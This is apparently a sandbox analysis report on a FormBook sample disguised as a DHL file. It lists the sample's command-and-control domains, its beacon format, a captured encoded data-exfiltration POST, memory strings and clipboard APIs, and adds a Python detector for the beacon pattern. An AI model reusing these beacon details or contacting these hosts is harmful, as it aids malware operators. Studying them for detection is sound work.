Source: global traffic; HTTP traffic detected: GET /fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.empowermedeco.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
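Every GET above has the same shape: a short path (/fo8o/), one long base64-looking parameter (k0), a constant second parameter (hh=cJ5D4t7Hz6GD3fB), Connection: close and a fixed MSIE 8.0 user agent, sent to a different host each time. FormBook walks a list of mostly decoy domains on each check-in cycle, which is why the report shows more DNS queries than HTTP requests and why Suricata alerts on each destination separately. The Python below is an added example, not the report's output and not the logic of ET rule 2050745: it parses raw HTTP requests, groups them by path and parameter names, and flags a group that reuses one constant token across several hosts. The request texts are constructed from the hosts, path, hh token and User-Agent above with truncated k0 payloads, plus one POST and one made-up benign request for contrast; the three-host threshold is an assumption.

```python
from urllib.parse import urlsplit, parse_qsl


def parse_request(raw: str) -> dict:
    """Parse a raw HTTP/1.x request (request line, headers, optional body) into the
    fields the grouping below needs: method, host, path, parameter names, 'hh' value."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    # the POST check-in carries its parameters in a form-encoded body instead of the query
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body, keep_blank_values=True)
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": parts.path,
        "params": tuple(sorted(name for name, _ in params)),
        "hh": dict(params).get("hh"),
        "user_agent": headers.get("user-agent", ""),
    }


def cluster_by_shape(requests: list[dict]) -> dict:
    """Group parsed requests by (path, parameter names): a beacon keeps that shape
    while the host changes."""
    groups = {}
    for r in requests:
        g = groups.setdefault((r["path"], r["params"]), {"hosts": set(), "hh": set()})
        g["hosts"].add(r["host"])
        if r["hh"] is not None:
            g["hh"].add(r["hh"])
    return groups


def flag_formbook_like(requests: list[dict], min_hosts: int = 3) -> list[dict]:
    """Flag a request shape sent to at least min_hosts distinct hosts with a single
    constant 'hh' token. ASSUMPTION: this approximates the check-in pattern seen in the
    report; it is not the ET rule's logic and the threshold is arbitrary."""
    flagged = []
    for (path, params), g in cluster_by_shape(requests).items():
        if len(g["hosts"]) >= min_hosts and len(g["hh"]) == 1:
            flagged.append({"path": path, "params": params,
                            "hosts": sorted(g["hosts"]), "hh": next(iter(g["hh"]))})
    return flagged


# Constructed request texts: hosts, path, 'hh' token and User-Agent are the report's;
# the k0 payloads are truncated to keep the sample short.
UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
      ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
      ".NET4.0C; .NET4.0E; InfoPath.2)")


def checkin_get(host: str, k0: str) -> str:
    return (f"GET /fo8o/?k0={k0}&hh=cJ5D4t7Hz6GD3fB HTTP/1.1\r\n"
            f"Host: {host}\r\nConnection: close\r\nUser-Agent: {UA}\r\n\r\n")


SAMPLE_REQUESTS = [
    checkin_get("www.3xfootball.com", "IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4"),
    checkin_get("www.goldenjade-travel.com", "LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9b"),
    checkin_get("www.magmadokum.com", "qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AA"),
    checkin_get("www.rssnewscast.com", "x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMq"),
    checkin_get("www.techchains.info", "vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYL"),
    # POST check-in: k0 in the body, no hh, so it forms its own (unflagged) group
    ("POST /fo8o/ HTTP/1.1\r\nHost: www.goldenjade-travel.com\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
     f"User-Agent: {UA}\r\n\r\nk0=GHiKxe4Q6VhKKesMLwntkcE1"),
    # made-up benign request for contrast
    "GET /search?q=dhl+tracking HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n\r\n",
]

if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for hit in flag_formbook_like(parsed):
        print(hit["path"], hit["params"], hit["hh"], len(hit["hosts"]), "hosts")
```

The grouping deliberately ignores the k0 value, which changes on every request, and keys on what the bot cannot vary without changing its server side: the path and the parameter names. A 404 from a decoy host (as in the responses below) does not clear the request; the same shape to many hosts is the signal.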
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
Source: unknown; HTTP traffic detected: POST /fo8o/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Host: www.goldenjade-travel.com | Origin: http://www.goldenjade-travel.com | Cache-Control: no-cache | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 203 | Referer: http://www.goldenjade-travel.com/fo8o/ | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) | Data Raw: 6b 30 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d | Data Ascii: k0=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 07 Dec 2024 06:00:32 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Sat, 07 Dec 2024 06:00:58 GMT | Connection: close | Content-Length: 315 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Sat, 07 Dec 2024 06:01:00 GMT | Connection: close | Content-Length: 315 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Sat, 07 Dec 2024 06:01:03 GMT | Connection: close | Content-Length: 315 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Sat, 07 Dec 2024 06:01:06 GMT | Connection: close | Content-Length: 315 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:00 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:06 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:08 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:24 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4475242478.0000000004ECC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4475242478.0000000004ECC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4474120065.0000000004322000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003922000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4474120065.0000000004322000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003922000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2387752917.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4474120065.000000000496A000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003F6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?k0=mxnR
            Source: netbtugc.exe, 00000004.00000002.4474120065.0000000003FFE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4475817977.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.00000000035FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.00000000035FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00824164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00824164
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00824164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00824164
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00823F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00823F66
